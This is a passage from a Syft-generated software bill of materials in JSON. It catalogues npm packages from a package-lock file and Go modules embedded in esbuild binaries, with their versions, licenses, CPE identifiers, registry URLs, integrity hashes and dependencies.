es":null}},{"id":"9d900b217a57abee","name":"gaxios","version":"6.7.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:gaxios:gaxios:6.7.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/gaxios@6.7.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/gaxios/-/gaxios-6.7.1.tgz","integrity":"sha512-LDODD4TMYx7XXdpwxAVRAIAuB0bzv0s+ywFonY46k126qzQHT9ygyoa9tncmOiQmmDrik65UYsEkv3lbfqQ3yQ==","dependencies":{"extend":"^3.0.2","https-proxy-agent":"^7.0.1","is-stream":"^2.0.0","node-fetch":"^2.6.9","uuid":"^9.0.1"}}},{"id":"aa3886c02ba5c2c5","name":"gcp-metadata","version":"6.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:gcp-metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:gcp-metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:gcp_metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:gcp_metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:gcp:gcp-metadata:6.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:gcp:gcp_metadata:6.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/gcp-metadata@6.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.1.tgz","integrity":"sha512-a4tiq7E0/5fTjxPAaH4jpjkSv/uCaU2p5KC6HVGrvl0cDjA8iBZv4vv1gyzlmK0ZUKqwpOyQMKzZQe3lTit77A==","dependencies":{"gaxios":"^6.1.1","google-logging-utils":"^0.0.2","json-bigint":"^1.0.0"}}},{"id":"adc0dd4bf4f30c10","name":"get-caller-file","version":"2.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:get-caller-file:get-caller-file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get-caller-file:get_caller_file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get_caller_file:get-caller-file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get_caller_file:get_caller_file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get-caller:get-caller-file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get-caller:get_caller_file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get_caller:get-caller-file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get_caller:get_caller_file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get:get-caller-file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get:get_caller_file:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/get-caller-file@2.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz","integrity":"sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==","dependencies":null}},{"id":"338eac46e71d483e","name":"get-intrinsic","version":"1.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:get-intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get-intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get_intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get_intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get:get-intrinsic:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get:get_intrinsic:1.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/get-intrinsic@1.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz","integrity":"sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==","dependencies":{"call-bind-apply-helpers":"^1.0.2","es-define-property":"^1.0.1","es-errors":"^1.3.0","es-object-atoms":"^1.1.1","function-bind":"^1.1.2","get-proto":"^1.0.1","gopd":"^1.2.0","has-symbols":"^1.1.0","hasown":"^2.0.2","math-intrinsics":"^1.1.0"}}},{"id":"64572c87855a75b1","name":"get-proto","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:get-proto:get-proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get-proto:get_proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get_proto:get-proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get_proto:get_proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get:get-proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:get:get_proto:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/get-proto@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz","integrity":"sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==","dependencies":{"dunder-proto":"^1.0.1","es-object-atoms":"^1.0.0"}}},{"id":"0b617a8d86aea060","name":"github.com/evanw/esbuild","version":"v0.0.0-20240609211631-fc37c2fa9de2","type":"go-module","foundBy":"go-module-binary-cataloger","locations":[{"path":"/node_modules/@esbuild/darwin-arm64/bin/esbuild","accessPath":"/node_modules/@esbuild/darwin-arm64/bin/esbuild","annotations":{"evidence":"primary"}}],"licenses":[],"language":"go","cpes":[{"cpe":"cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2","metadataType":"go-module-buildinfo-entry","metadata":{"goBuildSettings":[{"key":"-buildmode","value":"exe"},{"key":"-compiler","value":"gc"},{"key":"-trimpath","value":"true"},{"key":"CGO_ENABLED","value":"0"},{"key":"GOARCH","value":"arm64"},{"key":"GOOS","value":"darwin"},{"key":"vcs","value":"git"},{"key":"vcs.revision","value":"fc37c2fa9de2ad77476a6d4a8f1516196b90187e"},{"key":"vcs.time","value":"2024-06-09T21:16:31Z"},{"key":"vcs.modified","value":"false"}],"goCompiledVersion":"go1.20.12","architecture":"arm64","mainModule":"github.com/evanw/esbuild","goCryptoSettings":["standard-crypto"]}},{"id":"0dc26b5347e8f4df","name":"github.com/evanw/esbuild","version":"v0.0.0-20240609211631-fc37c2fa9de2","type":"go-module","foundBy":"go-module-binary-cataloger","locations":[{"path":"/node_modules/esbuild/bin/esbuild","accessPath":"/node_modules/esbuild/bin/esbuild","annotations":{"evidence":"primary"}}],"licenses":[],"language":"go","cpes":[{"cpe":"cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2","metadataType":"go-module-buildinfo-entry","metadata":{"goBuildSettings":[{"key":"-buildmode","value":"exe"},{"key":"-compiler","value":"gc"},{"key":"-trimpath","value":"true"},{"key":"CGO_ENABLED","value":"0"},{"key":"GOARCH","value":"arm64"},{"key":"GOOS","value":"darwin"},{"key":"vcs","value":"git"},{"key":"vcs.revision","value":"fc37c2fa9de2ad77476a6d4a8f1516196b90187e"},{"key":"vcs.time","value":"2024-06-09T21:16:31Z"},{"key":"vcs.modified","value":"false"}],"goCompiledVersion":"go1.20.12","architecture":"arm64","mainModule":"github.com/evanw/esbuild","goCryptoSettings":["standard-crypto"]}},{"id":"8da722cb9983d6b3","name":"glob","version":"10.5.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:isaacs:glob:10.5.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/glob@10.5.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/glob/-/glob-10.5.0.tgz","integrity":"sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg==","dependencies":{"foreground-child":"^3.1.0","jackspeak":"^3.1.2","minimatch":"^9.0.4","minipass":"^7.1.2","package-json-from-dist":"^1.0.0","path-scurry":"^1.11.1"}}},{"id":"e9e84f484cfaf367","name":"glob-parent","version":"5.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:gulpjs:glob-parent:5.1.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/glob-parent@5.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz","integrity":"sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==","dependencies":{"is-glob":"^4.0.1"}}},{"id":"1644b4942c7696f6","name":"glob-parent","version":"6.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:gulpjs:glob-parent:6.0.2:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/glob-parent@6.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz","integrity":"sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==","dependencies":{"is-glob":"^4.0.3"}}},{"id":"7890a665ce9e5849","name":"golang.org/x/sys","version":"v0.0.0-20220715151400-c0bba94af5f8","type":"go-module","foundBy":"go-module-binary-cataloger","locations":[{"path":"/node_modules/@esbuild/darwin-arm64/bin/esbuild","accessPath":"/node_modules/@esbuild/darwin-arm64/bin/esbuild","annotations":{"evidence":"primary"}}],"licenses":[],"language":"go","cpes":[{"cpe":"cpe:2.3:a:golang:x\\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8","metadataType":"go-module-buildinfo-entry","metadata":{"goCompiledVersion":"go1.20.12","architecture":"arm64","h1Digest":"h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=","mainModule":"github.com/evanw/esbuild","goCryptoSettings":["standard-crypto"]}},{"id":"839067488ff020a0","name":"golang.org/x/sys","version":"v0.0.0-20220715151400-c0bba94af5f8","type":"go-module","foundBy":"go-module-binary-cataloger","locations":[{"path":"/node_modules/esbuild/bin/esbuild","accessPath":"/node_modules/esbuild/bin/esbuild","annotations":{"evidence":"primary"}}],"licenses":[],"language":"go","cpes":[{"cpe":"cpe:2.3:a:golang:x\\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8","metadataType":"go-module-buildinfo-entry","metadata":{"goCompiledVersion":"go1.20.12","architecture":"arm64","h1Digest":"h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=","mainModule":"github.com/evanw/esbuild","goCryptoSettings":["standard-crypto"]}},{"id":"4fb04863a4dacd73","name":"google-auth-library","version":"9.15.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:google-auth-library:google-auth-library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google-auth-library:google_auth_library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_auth_library:google-auth-library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_auth_library:google_auth_library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google-auth:google-auth-library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google-auth:google_auth_library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_auth:google-auth-library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_auth:google_auth_library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google:google-auth-library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google:google_auth_library:9.15.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/google-auth-library@9.15.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.15.1.tgz","integrity":"sha512-Jb6Z0+nvECVz+2lzSMt9u98UsoakXxA2HGHMCxh+so3n90XgYWkq5dur19JAJV7ONiJY22yBTyJB1TSkvPq9Ng==","dependencies":{"base64-js":"^1.3.0","ecdsa-sig-formatter":"^1.0.11","gaxios":"^6.1.1","gcp-metadata":"^6.1.0","gtoken":"^7.0.0","jws":"^4.0.0"}}},{"id":"3344aade71052029","name":"google-gax","version":"4.6.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:google-gax:google-gax:4.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google-gax:google_gax:4.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_gax:google-gax:4.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_gax:google_gax:4.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google:google-gax:4.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google:google_gax:4.6.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/google-gax@4.6.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/google-gax/-/google-gax-4.6.1.tgz","integrity":"sha512-V6eky/xz2mcKfAd1Ioxyd6nmA61gao3n01C+YeuIwu3vzM9EDR6wcVzMSIbLMDXWeoi9SHYctXuKYC5uJUT3eQ==","dependencies":{"@grpc/grpc-js":"^1.10.9","@grpc/proto-loader":"^0.7.13","@types/long":"^4.0.0","abort-controller":"^3.0.0","duplexify":"^4.0.0","google-auth-library":"^9.3.0","node-fetch":"^2.7.0","object-hash":"^3.0.0","proto3-json-serializer":"^2.0.2","protobufjs":"^7.3.2","retry-request":"^7.0.0","uuid":"^9.0.1"}}},{"id":"c45a9f7f7c5a1d26","name":"google-logging-utils","version":"0.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:google-logging-utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google-logging-utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_logging_utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_logging_utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google-logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google-logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google_logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google:google-logging-utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:google:google_logging_utils:0.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/google-logging-utils@0.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/google-logging-utils/-/google-logging-utils-0.0.2.tgz","integrity":"sha512-NEgUnEcBiP5HrPzufUkBzJOD/Sxsco3rLNo1F1TNf7ieU8ryUzBhqba8r756CjLX7rn3fHl6iLEwPYuqpoKgQQ==","dependencies":null}},{"id":"2f2433574e565258","name":"gopd","version":"1.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:gopd:gopd:1.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/gopd@1.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz","integrity":"sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==","dependencies":null}},{"id":"45319b4c36cfb339","name":"graceful-fs","version":"4.2.11","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:graceful-fs:graceful-fs:4.2.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:graceful-fs:graceful_fs:4.2.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:graceful_fs:graceful-fs:4.2.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:graceful_fs:graceful_fs:4.2.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:graceful:graceful-fs:4.2.11:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:graceful:graceful_fs:4.2.11:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/graceful-fs@4.2.11","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz","integrity":"sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==","dependencies":null}},{"id":"fe4d11ddc8ba95f7","name":"gtoken","version":"7.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:gtoken:gtoken:7.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/gtoken@7.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz","integrity":"sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw==","dependencies":{"gaxios":"^6.0.0","jws":"^4.0.0"}}},{"id":"fcd80b2c54be3c8f","name":"has-symbols","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:has-symbols:has-symbols:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has-symbols:has_symbols:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has_symbols:has-symbols:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has_symbols:has_symbols:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has:has-symbols:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has:has_symbols:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/has-symbols@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz","integrity":"sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==","dependencies":null}},{"id":"7749e9981a33e1c1","name":"has-tostringtag","version":"1.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:has-tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has-tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has_tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has_tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has:has-tostringtag:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:has:has_tostringtag:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/has-tostringtag@1.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz","integrity":"sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==","dependencies":{"has-symbols":"^1.0.3"}}},{"id":"6f96b80a7d603954","name":"hasown","version":"2.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:hasown:hasown:2.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/hasown@2.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz","integrity":"sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==","dependencies":{"function-bind":"^1.1.2"}}},{"id":"ad14b3d3d950e009","name":"helmet","version":"7.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:helmet:helmet:7.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/helmet@7.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/helmet/-/helmet-7.2.0.tgz","integrity":"sha512-ZRiwvN089JfMXokizgqEPXsl2Guk094yExfoDXR0cBYWxtBbaSww/w+vT4WEJsBW2iTUi1GgZ6swmoug3Oy4Xw==","dependencies":null}},{"id":"5912401178cdcd30","name":"hsl-to-hex","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/pack